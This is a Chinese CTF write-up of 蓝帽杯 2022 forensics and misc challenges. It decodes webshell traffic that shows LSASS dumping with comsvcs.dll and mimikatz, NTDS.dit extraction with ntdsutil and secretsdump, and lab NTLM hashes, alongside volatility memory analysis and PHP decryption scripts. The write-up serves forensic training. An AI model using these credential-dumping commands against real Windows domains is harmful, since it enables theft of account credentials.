蓝帽杯 2022 Writeup

 CTF / 蓝帽杯
被浏览

7月底划水打了蓝帽杯,然后一直没写 wp 鸽到现在,感觉整个暑假啥也没干,应该写点啥。

Misc

domainhacker

本来在准备 hvv,但由于疫情原因不了了之。不过鉴于那段时间的培训,一下子就分辨出是蚁剑的流量。本题的流量是经过 base64 加密并且加 Salt 的,不过可以从代码还原出来。

在流量包的请求体中能轻松辨别出参数,解码后依次有以下这些有用的指令:

1
2
3
4
5
6
cd /d "C:\\phpstudy_pro\\WWW"&powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 476 C:\windows\temp\lsass.dmp full"&echo efa923ba504&cd&echo 1a4be8815ef8
# 将内存中 dump 出来
cd /d "c:\\Windows\\Temp"&mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit" > 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8
# 用 mimikatz 把内存中的域信息导出到 1.txt
cd /d "c:\\Windows\\Temp"&rar.exe a -PSecretsPassw0rds 1.rar 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8
# 进行加密压缩

这样我们就知道压缩包密码是 SecretsPassw0rds,之后还有个下载请求,分离出压缩包,解压得到 1.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : PDC$
Domain            : TEST
Logon Server      : (null)
Logon Time        : 2022/4/15 22:22:24
SID               : S-1-5-20
    msv :	
     [00000003] Primary
     * Username : PDC$
     * Domain   : TEST
     * NTLM     : 416f89c3a5deb1d398a1a1fce93862a7
     * SHA1     : 54896b6f5e60e9be2b46332b13d0e0f110d6518f
    tspkg :	
    wdigest :	
     * Username : PDC$
     * Domain   : TEST
     * Password : (null)
    kerberos :	
     * Username : pdc$
     * Domain   : test.local
     * Password : 15 e0 7e 07 d9 9d 3d 42 45 40 38 ec 97 d6 25 59 c9 e8 05 d9 fa bd 81 f9 2e 05 67 84 e1 a3 a3 ec eb 65 ba 6e b9 60 9b dd 5a 74 4b 2e 07 68 94 fd a1 cb 2e 7b a2 13 07 31 34 c2 1d e8 95 53 43 38 61 91 53 2b c4 b0 3e ea 7a ac 03 60 1f bf e8 dc 00 c5 fe 13 ed 7a ca 88 32 fc d0 c6 ea d2 c7 b4 87 31 82 dd 4c 96 4f 23 80 39 2e 31 b0 cf 67 8e 63 b2 5e f9 77 32 44 05 8e 22 f9 0c 69 32 64 1b b8 2d a0 99 0e b8 0e 2c 10 b6 ff 6d 5f 11 c9 5e 46 eb 62 df 00 7a bd c6 7b 83 db 0f 58 ed ac a3 66 dd c2 ec df 9f 22 b3 34 0d 07 89 ea 3b 2b b1 e1 f9 e2 e5 85 cd a3 78 ae dd e3 98 78 39 8e 4f 49 5a b6 05 4c 6d 1a e6 fa 30 c7 c6 fb 4d dc b4 ca f6 3c 20 fe 70 eb e3 16 82 78 f8 49 8d 15 6a 15 10 ac d8 68 f8 ef ad 0c c2 39 f2 ca 80 ef 96 
    ssp :	KO
    credman :

把 NTLM 的值作为 flag 即可:flag{416f89c3a5deb1d398a1a1fce93862a7}

domainhacker2

类似的,同样是蚁剑的流量,不过指令种类更加丰富(有机会来分析一下各类流量)。

同样提取出有用的指令:

1
cd /d "C:\\phpstudy_pro\\WWW"&dsquery computer&echo 1d3632&cd&echo 78bc462ab

获取到域中的计算机(CN = Common Name,OU = Organizational Unit,DC = Domain Component):

1
2
3
4
5
6
7
8
"CN=PDC,OU=Domain Controllers,DC=test,DC=local"
"CN=EXCHANGE,CN=Computers,DC=test,DC=local"
"CN=SDC,OU=Domain Controllers,DC=test,DC=local"
"CN=testnew,CN=Computers,DC=test,DC=local"
"CN=WIN-PJ6ELFEG09P,CN=Computers,DC=test,DC=local"
"CN=testcomputer,CN=Computers,DC=test,DC=local"
"CN=t,CN=Computers,DC=test,DC=local"
"CN=tt,CN=Computers,DC=test,DC=local"

获取本机名:

1
cd /d "C:\\phpstudy_pro\\WWW"&hostname&echo 1d3632&cd&echo 78bc462ab

得知本机为 PDC,结合之前的域信息得知本机就是域管理员。

新建了一个 log.txt,并写入以下内容:

1
2
3
4
5
ac i ntds
ifm
create full c:\windows\temp\new
q
q

这篇文章相同的方法(只是把 log.txt 作为流输入了)导出密钥信息:

1
cd /d "C:\\phpstudy_pro\\WWW"&cmd.exe /c ntdsutil.exe < log.txt >err.txt 2>&1&echo 1d3632&cd&echo 78bc462ab

导出到 err.txt,并获得回显:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
ntdsutil.exe: 活动实例设置为“ntds”。
ntdsutil.exe: ifm: 正在创建快照...
成功生成快照集 {f9c1f274-352f-439a-bdaa-7c3dd12b17c9}。
快照 {2c502f9f-0060-4286-a0f3-f1c10becc9db} 已作为 C:\$SNAP_202204161011_VOLUMEC$\ 装载
已装载快照 {2c502f9f-0060-4286-a0f3-f1c10becc9db}。
正在启动碎片整理模式...
     源数据库: C:\$SNAP_202204161011_VOLUMEC$\Windows\NTDS\ntds.dit
     目标数据库: c:\windows\temp\new\Active Directory\ntds.dit

                  Defragmentation  Status (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

正在复制注册表文件...
正在复制 c:\windows\temp\new\registry\SYSTEM
正在复制 c:\windows\temp\new\registry\SECURITY
快照 {2c502f9f-0060-4286-a0f3-f1c10becc9db} 已卸载。
在 c:\windows\temp\new 中成功创建 IFM 媒体。
ifm: ntdsutil.exe: 1d3632

然后和前一题一样使用压缩包打包,密码是 FakePassword123$,不得不说挺有迷惑性的:

1
cd /d "c:\\Windows\\Temp"&rar.exe a -PFakePassword123$ ntds.rar new&echo 1d3632&cd&echo 78bc462ab

我们用 impacket 的 secretsdump 脚本导出密钥信息,注意要历史密钥:

1
python secretsdump.py -system "domainhacker2_184c16876d41965a695f89232ae5392d\new\registry\SYSTEM" -security "domainhacker2_184c16876d41965a695f89232ae5392d\new\registry\SECURITY" -ntds "domainhacker2_184c16876d41965a695f89232ae5392d\new\Active Directory\ntds.dit" LOCAL -just-dc-ntlm -history

省略了中间的一些邮箱服务检测账户:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Impacket v0.10.1.dev1+20220708.213759.8b1a99f7 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0xf5a55bb9181f33269276949d2ad680e5
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 752aa10b88b269bd735d54b802d5c86c
[*] Reading and decrypting hashes from C:\Users\YuGao\Downloads\domainhacker2_184c16876d41965a695f89232ae5392d\new\Active Directory\ntds.dit
test.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:a85016dddda9fe5a980272af8f54f20e:::
test.local\Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:07ab403ab740c1540c378b0f5aaa4087:::
test.local\Administrator_history1:500:aad3b435b51404eeaad3b435b51404ee:34e92e3e4267aa7055a284d9ece2a3ee:::
test.local\Administrator_history2:500:aad3b435b51404eeaad3b435b51404ee:34e92e3e4267aa7055a284d9ece2a3ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Admin:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
test:1003:aad3b435b51404eeaad3b435b51404ee:4f95f1c5acfc3b972a1ce2a29ef1f1c5:::
test_history0:1003:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
test_history1:1003:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
PDC$:1004:aad3b435b51404eeaad3b435b51404ee:416f89c3a5deb1d398a1a1fce93862a7:::
PDC$_history0:1004:aad3b435b51404eeaad3b435b51404ee:77c3da77dc1b7a6c257ba59cd4633209:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8d9c46df1a433693842082203898424f:::
EXCHANGE$:1107:aad3b435b51404eeaad3b435b51404ee:8f203498c3054ed0e01efc9d1da10ecd:::
EXCHANGE$_history0:1107:aad3b435b51404eeaad3b435b51404ee:c5c7378155dc9d28ad53d8c1f9e9d915:::
......
test1:1149:aad3b435b51404eeaad3b435b51404ee:8cbbbea6034f5c9ea6bc4eb980efec4d:::
test1_history0:1149:aad3b435b51404eeaad3b435b51404ee:8cbbbea6034f5c9ea6bc4eb980efec4d:::
test1_history1:1149:aad3b435b51404eeaad3b435b51404ee:8cbbbea6034f5c9ea6bc4eb980efec4d:::
test1_history2:1149:aad3b435b51404eeaad3b435b51404ee:8cbbbea6034f5c9ea6bc4eb980efec4d:::
test1_history3:1149:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
SDC$:1151:aad3b435b51404eeaad3b435b51404ee:9f40caf799bf0d110fdf08b3bf3eb6c0:::
SDC$_history0:1151:aad3b435b51404eeaad3b435b51404ee:8f3cfaf7a6290b735bcbba5b60d554d4:::
SDC$_history1:1151:aad3b435b51404eeaad3b435b51404ee:7bfe440904b9611776477b85eea398fc:::
testnew$:1152:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
WIN-PJ6ELFEG09P$:1153:aad3b435b51404eeaad3b435b51404ee:6533cba50e01cace16567ec5691e587f:::
testcomputer$:1154:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
t$:1155:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
tt$:1156:aad3b435b51404eeaad3b435b51404ee:c22b315c040ae6e0efee3518d830362b:::
WebApp01$:1157:aad3b435b51404eeaad3b435b51404ee:b021fa4e92913d91a6eade97884f508b:::
aaa:1158:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
[*] Cleaning up...

题目要的是 administrator 的上一次 ntlm,别弄错了!

flag{07ab403ab740c1540c378b0f5aaa4087}

电子取证

手机取证

感觉是推销盘古石取证的题(雾),用给的工具找就行了,纯粹的签到题。

计算机取证_1

用老牌工具 volatility 直接 hashdump 即可,值得注意的是 volatility3 的使用方法和 v2 有很大的不同,网上也没啥教程,摸索了半天。

下面的是最后弄出来的最简单的办法,中途用的是 volshell,非常折磨。

1
.\vol.py -f 1.dmp windows.hashdump.Hashdump
1
2
3
4
5
6
7
8
9
Volatility 3 Framework 2.3.0
Progress:  100.00               PDB scanning finished
User    rid     lmhash  nthash

Administrator   500     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
Guest   501     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
taqi7   1000    aad3b435b51404eeaad3b435b51404ee        7f21caca5685f10d9e849cc84c340528
naizheng        1002    aad3b435b51404eeaad3b435b51404ee        d123b09e13b1a82277c3e3f0ca722060
qinai   1003    aad3b435b51404eeaad3b435b51404ee        1c333843181864a58156f3e9498fe905

7f21caca5685f10d9e849cc84c340528 去 MD5 网站查询得到是 anxinqi

计算机取证_2

还是用的 volatility:

1
.\vol.py -f "C:\Users\YuGao\Documents\Tencent Files\2645943187\FileRecv\计算机取证\1.dmp" windows.pslist.PsList > log.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
Volatility 3 Framework 2.3.0

PID    PPID	ImageFileName	Offset(V)	Threads	Handles	SessionId	Wow64	CreateTime	ExitTime	File output

4    0	System	0xfa800ccc7890	105	623	N/A	False	2022-04-28 05:38:41.000000 	N/A	Disabled
288    4	smss.exe	0xfa800d9c3610	2	29	N/A	False	2022-04-28 05:38:41.000000 	N/A	Disabled
384    376	csrss.exe	0xfa800e100740	9	486	0	False	2022-04-28 05:38:42.000000 	N/A	Disabled
424    376	wininit.exe	0xfa800e4a3840	3	78	0	False	2022-04-28 05:38:43.000000 	N/A	Disabled
436    416	csrss.exe	0xfa800e4a7b30	10	645	1	False	2022-04-28 05:38:43.000000 	N/A	Disabled
492    416	winlogon.exe	0xfa800e50b060	5	116	1	False	2022-04-28 05:38:43.000000 	N/A	Disabled
532    424	services.exe	0xfa800e523910	6	216	0	False	2022-04-28 05:38:43.000000 	N/A	Disabled
544    424	lsass.exe	0xfa800e52fb30	6	614	0	False	2022-04-28 05:38:43.000000 	N/A	Disabled
552    424	lsm.exe	0xfa800e489060	11	209	0	False	2022-04-28 05:38:43.000000 	N/A	Disabled
...
1020    776	audiodg.exe	0xfa800e6f7060	6	131	0	False	2022-04-28 05:38:44.000000 	N/A	Disabled
420    532	svchost.exe	0xfa800e722060	9	530	0	False	2022-04-28 05:38:44.000000 	N/A	Disabled
956    532	ZhuDongFangYu.	0xfa800e749b30	26	394	0	True	2022-04-28 05:38:44.000000 	N/A	Disabled
1040    532	svchost.exe	0xfa800e75a950	23	636	0	False	2022-04-28 05:38:44.000000 	N/A	Disabled
1300    532	spoolsv.exe	0xfa800e85b570	12	313	0	False	2022-04-28 05:38:45.000000 	N/A	Disabled
1336    532	svchost.exe	0xfa800e88cb30	17	321	0	False	2022-04-28 05:38:45.000000 	N/A	Disabled
1440    532	svchost.exe	0xfa800e907630	4	81	0	True	2022-04-28 05:38:45.000000 	N/A	Disabled
1548    532	vmtoolsd.exe	0xfa800e9c6740	9	276	0	False	2022-04-28 05:38:45.000000 	N/A	Disabled
1960    532	svchost.exe	0xfa800eabd060	5	101	0	False	2022-04-28 05:38:46.000000 	N/A	Disabled
1612    532	dllhost.exe	0xfa800eb07b30	13	186	0	False	2022-04-28 05:38:46.000000 	N/A	Disabled
2068    532	msdtc.exe	0xfa800eb36b30	12	144	0	False	2022-04-28 05:38:48.000000 	N/A	Disabled
2512    532	svchost.exe	0xfa800eabe980	11	146	0	False	2022-04-28 05:40:46.000000 	N/A	Disabled
2584    532	svchost.exe	0xfa800ea79b30	13	335	0	False	2022-04-28 05:40:46.000000 	N/A	Disabled
2648    532	SearchIndexer.	0xfa800eaa8310	11	658	0	False	2022-04-28 05:40:47.000000 	N/A	Disabled
1792    660	WmiPrvSE.exe	0xfa800ea7a0f0	7	114	0	False	2022-04-28 05:42:48.000000 	N/A	Disabled
916    532	taskhost.exe	0xfa800cdf4b30	9	209	1	False	2022-04-28 05:42:55.000000 	N/A	Disabled
972    920	dwm.exe	0xfa800cdfe210	3	70	1	False	2022-04-28 05:42:55.000000 	N/A	Disabled
2044    1716	explorer.exe	0xfa800e585b30	53	1335	1	False	2022-04-28 05:42:55.000000 	N/A	Disabled
2672    2044	vmtoolsd.exe	0xfa800e83eb30	7	209	1	False	2022-04-28 05:42:56.000000 	N/A	Disabled
2664    2044	ldnews.exe	0xfa800e84f780	10	363	1	True	2022-04-28 05:42:56.000000 	N/A	Disabled
2436    956	360Tray.exe	0xfa800ea25580	150	1455	1	True	2022-04-28 05:42:57.000000 	N/A	Disabled
3500    2288	LiveUpdate360.	0xfa800edc8b30	18	305	1	True	2022-04-28 05:43:13.000000 	N/A	Disabled
4012    3784	360TptMon.exe	0xfa800ee90b30	17	415	1	True	2022-04-28 05:43:22.000000 	N/A	Disabled
3316    532	svchost.exe	0xfa800ee6bb30	3	57	0	True	2022-04-28 05:43:23.000000 	N/A	Disabled
3396    2436	SoftMgrLite.ex	0xfa800eb76b30	30	360	1	True	2022-04-28 05:44:13.000000 	N/A	Disabled
3496    2044	TrueCrypt.exe	0xfa800ec4b630	5	268	1	True	2022-04-28 05:46:22.000000 	N/A	Disabled
2964    3496	TrueCrypt Form	0xfa800ea45b30	0	-	1	False	2022-04-28 05:46:35.000000 	2022-04-28 05:47:59.000000 	Disabled
2548    2648	SearchProtocol	0xfa800ed78720	7	316	0	False	2022-04-28 05:52:53.000000 	N/A	Disabled
2872    2044	notepad.exe	0xfa800ec2e6f0	1	62	1	False	2022-04-28 05:54:13.000000 	N/A	Disabled
2192    2044	MagnetRAMCaptu	0xfa800f103b30	16	333	1	True	2022-04-28 05:54:30.000000 	N/A	Disabled
3880    2436	360speedld.exe	0xfa800ea7b910	4	94	1	True	2022-04-28 05:54:54.000000 	N/A	Disabled
3604    660	dllhost.exe	0xfa800ef76b30	6	91	1	False	2022-04-28 05:54:55.000000 	N/A	Disabled

可以看到有个 MagnetRAMCaptu,一看就是制作内存镜像的,PID 就是答案。

网站取证_1

直接搜索常见的木马特征如 assert eval 等发现直接找到了。

后门在 runtime\temp 目录下。

网站取证_2

直接源码搜索“数据库”,发现有个 database.php 规定了数据库有关信息。

引用了 encrypt/encrypt.php,并且密码由 my_encrypt() 生成。

继续跟进,找到函数 my_encrypt,运行即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
function my_encrypt(){
    $str = 'P3LMJ4uCbkFJ/RarywrCvA==';
    $str = str_replace(array("/r/n", "/r", "/n"), "", $str);
    $key = 'PanGuShi';
    $iv = substr(sha1($key),0,16);
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
    mcrypt_generic_init($td, "PanGuShi", $iv);
    $decode = base64_decode($str);
    $dencrypted = mdecrypt_generic($td, $decode);
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    $dencrypted = trim($dencrypted);
    return $dencrypted;
}

得到答案 KBLT123

网站取证_3

发现金额有关的变量名都和 money 有关,源码搜索,发现 $param['money'] = $this->encrypt($param['money']);

查看 encrypt 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
function encrypt($data, $key = 'jyzg123456')
{
    $key = md5($key);
    $x  = 0;
    $len = strlen($data);
    $l  = strlen($key);
    $char = '';
    $str = '';
    for ($i = 0; $i < $len; $i++)
    {
        if ($x == $l)
        {
            $x = 0;
        }
        $char .= $key{$x};
        $x++;
    }
    for ($i = 0; $i < $len; $i++)
    {
        $str .= chr(ord($data{$i}) + (ord($char{$i})) % 256);
    }
    return base64_encode($str);
}

发现 Salt 就是 jyzg123456

网站取证_4

把数据库中表以及列的作用都弄明白:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
COMMENT ON COLUMN "public"."tab_user"."id" IS '用户id';
COMMENT ON COLUMN "public"."tab_user"."name" IS '用户名';
COMMENT ON COLUMN "public"."tab_user"."password" IS '用户密码';
COMMENT ON COLUMN "public"."tab_user"."role" IS '用户权限角色
1:超级管理员
2:系统管理员
3:仓库管理员
4:门店管理员
5:分销商
6:装修公司
7:业务员
8:技术员';
COMMENT ON COLUMN "public"."tab_user"."state" IS '激活状态(1:激活使用  ,2:暂停使用)';
COMMENT ON COLUMN "public"."tab_user"."belong_to" IS '所属门店';
COMMENT ON COLUMN "public"."tab_user"."nick_name" IS '用户姓名';
COMMENT ON COLUMN "public"."tab_user"."sex" IS '性别(1:男   2:女)';
COMMENT ON COLUMN "public"."tab_user"."tel" IS '联系电话';
COMMENT ON COLUMN "public"."tab_user"."address" IS '地址';
COMMENT ON COLUMN "public"."tab_user"."report_num" IS '业务员最大报备数';
COMMENT ON COLUMN "public"."tab_user"."is_create_time" IS '创建时间';
COMMENT ON TABLE "public"."tab_user" IS '用户表';
    
INSERT INTO "public"."tab_user" VALUES (3, '张宝', '967ee505bd742d713528ad2e55a04bba', 3, 1, NULL, '', 1, '', '', NULL, '158720003133', NULL, '2018-04-09 19:00:00');
INSERT INTO "public"."tab_user" VALUES (4, '李进', '34b5c38d19b3352df6db3e976b237d37', 3, 1, NULL, '', 1, '', '', NULL, '18765877676', NULL, '2018-04-09 19:00:00');
INSERT INTO "public"."tab_user" VALUES (5, '王子豪', 'f783ca62ff21833fdcfe3b74e1a82e1c', 3, 1, NULL, '王子豪', 1, '', '', NULL, '', NULL, '2020-04-18 16:04:53');
INSERT INTO "public"."tab_user" VALUES (6, '赵燕', 'bca725be29834465fa5a9e3bc6423b48', 3, 1, NULL, '赵燕', 2, '', '', NULL, '', NULL, '2020-04-18 16:06:06');
INSERT INTO "public"."tab_user" VALUES (1, 'superAdmin', 'ca6d00723bc83590c909b0decc97e34d', 1, 1, NULL, '', 1, '', '', NULL, '158736346560', NULL, '2018-04-08 18:02:21');
INSERT INTO "public"."tab_user" VALUES (2, 'admin', 'aa590a519a1c4862c5051a9bb0e07456', 2, 1, NULL, '', 1, '', '', NULL, '158736377751', NULL, '2018-04-09 18:22:21');

COMMENT ON COLUMN "public"."tab_channel_order_list"."order_num" IS '订单号';
COMMENT ON COLUMN "public"."tab_channel_order_list"."currency" IS '币种';
COMMENT ON COLUMN "public"."tab_channel_order_list"."remark" IS '备注';
COMMENT ON COLUMN "public"."tab_channel_order_list"."is_create_time" IS '创建时间';
COMMENT ON COLUMN "public"."tab_channel_order_list"."payee_id" IS '收款人ID';
COMMENT ON COLUMN "public"."tab_channel_order_list"."payer_id" IS '付款人ID';

-- ----------------------------
-- Records of tab_channel_order_list
-- ----------------------------
INSERT INTO "public"."tab_channel_order_list" VALUES (1, '271188138699', 'GG币', NULL, '2022-04-01 00:00:50', 4, 2, 'nJ1xlG5v');
...
INSERT INTO "public"."tab_channel_order_list" VALUES (5000, '622260854407', 'GG币', NULL, '2022-04-30 23:55:13', 4, 3, 'lJRvnWtr');

将语句处理成易于读取的格式:

data.txt

1
2
3
4
5
6
(1, '271188138699', '2022-04-01 00:00:50', 4, 2, 'nJ1xlG5v')
(2, '272206877227', '2022-04-01 00:23:01', 4, 3, 'lpZqmGps')
...
(4998, '331754109613', '2022-04-30 23:32:04', 6, 2, 'mplrlW9p')
(4999, '109211499552', '2022-04-30 23:35:25', 4, 6, 'mphwnXBr')
(5000, '622260854407', '2022-04-30 23:55:13', 4, 3, 'lJRvnWtr')

exchange_rate.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
('1', 0.05, '2022-04-01')
('2', 0.04, '2022-04-02')
('3', 0.06, '2022-04-03')
('4', 0.05, '2022-04-04')
('5', 0.07, '2022-04-05')
('6', 0.10, '2022-04-06')
('7', 0.15, '2022-04-07')
('8', 0.17, '2022-04-08')
('9', 0.23, '2022-04-09')
('10', 0.22, '2022-04-10')
('11', 0.25, '2022-04-11')
('12', 0.29, '2022-04-12')
('13', 0.20, '2022-04-13')
('14', 0.28, '2022-04-14')
('15', 0.33, '2022-04-15')
('16', 0.35, '2022-04-16')
('17', 0.35, '2022-04-17')
('18', 0.37, '2022-04-18')
('19', 0.38, '2022-04-19')
('20', 0.40, '2022-04-20')
('21', 0.38, '2022-04-21')
('22', 0.39, '2022-04-22')
('23', 0.45, '2022-04-23')
('24', 0.44, '2022-04-24')
('25', 0.50, '2022-04-25')
('26', 0.55, '2022-04-26')
('27', 0.51, '2022-04-27')
('28', 0.52, '2022-04-28')
('29', 0.53, '2022-04-29')
('30', 0.50, '2022-04-30')

然后提取出题目要求的转账记录,根据前一题的加密脚本解密,然后按照汇率转成 RMB,求和即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<?php
function decrypt($data, $key = 'jyzg123456') {
    $key = md5($key);
    $x = 0;
    $data = base64_decode($data);
    $len = strlen($data);
    $l = strlen($key);
    $char = '';
    $str = '';
    for ($i = 0; $i < $len; $i++) {
        if ($x == $l) {
            $x = 0;
        }
        $char .= $key[$x];
        $x++;
    }
    for ($i = 0; $i < $len; $i++) {
        $str .= chr((ord($data[$i]) - ord($char[$i]) + 256) % 256);
    }
    return $str;
}
$file = fopen("exchange_rate.txt", "r");
$rate = array();
while(!feof($file)) {
    $str = fgets($file);
    list($id, $x, $time) = sscanf($str, "(%s %f, %s)");
    $rate[] = $x;
}
fclose($file);
// 3 -> 5
$file = fopen("data.txt", "r");
$res = 0;
while(!feof($file)) {
    $str = fgets($file);
    list($id_1, $id_2, $date, $time, $to, $from, $enc) = sscanf($str, "(%d, %s %s %s %d, %d, %s)");
    if ($from != 3 || $to != 5) {
        continue;
    }
    $enc = substr($enc, 1, strlen($enc) - 3);
    $date = substr($date, strlen($date) - 2, 2) - 1;
    if ($date < 1 || $date > 17) {
        continue;
    }
    $res = $res + $rate[$date] * decrypt($enc);
}
echo $res;
fclose($file);

最后答案是 15758353.76

 上一页